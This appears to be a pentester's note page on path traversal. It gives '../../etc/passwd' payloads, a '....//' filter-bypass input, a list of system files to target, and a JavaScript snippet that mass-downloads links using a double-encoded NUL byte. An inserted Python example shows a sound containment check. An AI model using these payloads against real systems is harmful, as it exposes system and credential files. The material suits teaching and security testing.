Path traversal
Path traversal is a vulnerability that allows a hacker to access files/folders that were not supposed to be available to users by exploiting the application.
⚠️ You should use HTTP clients to perform path traversal attacks, as browsers may send something different from what you wrote.
For instance, http://example.com/image-preview.php?url=... is supposed to display an image given a URL.
You can use the dot-dot-slash attack, and give a URL such as ../../../../../etc/passwd. You can add more ../ than needed, but try to find the least number required.
It's used by other attacks such as File inclusion or SSRF.
Bypass filters
- If there is a function removing ../, then you can craft a payload that will only work as expected once the input has been filtered.
  Input: ....//
  Apply Filter: remove ../
  Output: ../
- Try URL encoding
- The path may have to start with a specific folder
- Some systems support /./ or // in payloads
- Always start with a path that may work
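The single-pass filter from the first bullet, next to a containment check that does not depend on filtering. This is an added example, not code from the original page; the function names, the images directory and the sample inputs are constructed for illustration.

```python
import os
import tempfile


def naive_filter(user_path: str) -> str:
    """Single-pass removal of '../', the weak filter described above."""
    return user_path.replace("../", "")


def resolve_inside(base_dir: str, user_path: str) -> str:
    """Return the canonical path of user_path, or raise if it leaves base_dir."""
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    base = os.path.realpath(base_dir)
    # realpath collapses '..', '/./', '//' and symlinks before the comparison.
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate


def demo() -> dict:
    """Run constructed inputs through the weak filter, then the containment check."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "images")  # hypothetical upload directory
        os.makedirs(base)
        open(os.path.join(base, "cat.png"), "wb").close()
        samples = ["cat.png", "./cat.png", "....//....//etc/passwd", "/etc/passwd"]
        for raw in samples:
            filtered = naive_filter(raw)
            try:
                resolve_inside(base, filtered)
                verdict = "allowed"
            except ValueError:
                verdict = "rejected"
            results[raw] = (filtered, verdict)
    return results


if __name__ == "__main__":
    for raw, (filtered, verdict) in demo().items():
        print(f"{raw!r:28} filter -> {filtered!r:22} check -> {verdict}")
```

The filter output for the third sample still contains ../ sequences, while the containment check rejects it because the decision is made on the resolved path rather than on the input string.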
👻 To-do 👻
Stuff that I found, but never read/used yet.
- default webserver roots
  - can be fuzzed
  - wordlists
    - default-web-root-directory-linux.txt
    - default-web-root-directory-windows.txt
    - SecLists LFI
  - /etc/php/X.Y/apache2/php.ini (web root)
  - /etc/php/X.Y/fpm/php.ini (web root)
- /etc/passwd
- C:\Windows\boot.ini
- Second Order Attack (poisoned database entry)
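// For each visible link, create a hidden copy with a download attribute and click it
Array.from(document.querySelectorAll('a:not([hidden])')).map(e => {
  let h = e.href
  // The file name is the part after the last slash
  const name = h.substring(h.lastIndexOf("/") + 1)
  if (name === "") return 0
  // %2500 is a double-encoded NUL byte, appended with .md when the link does not end in .md
  if (!h.endsWith(".md")) h += "%2500.md"
  const a = document.createElement('a')
  a.setAttribute('href', h)
  a.setAttribute('download', name)
  a.setAttribute('hidden', '')
  a.setAttribute('target', '_blank')
  document.body.appendChild(a)
  a.click()
  return 1
})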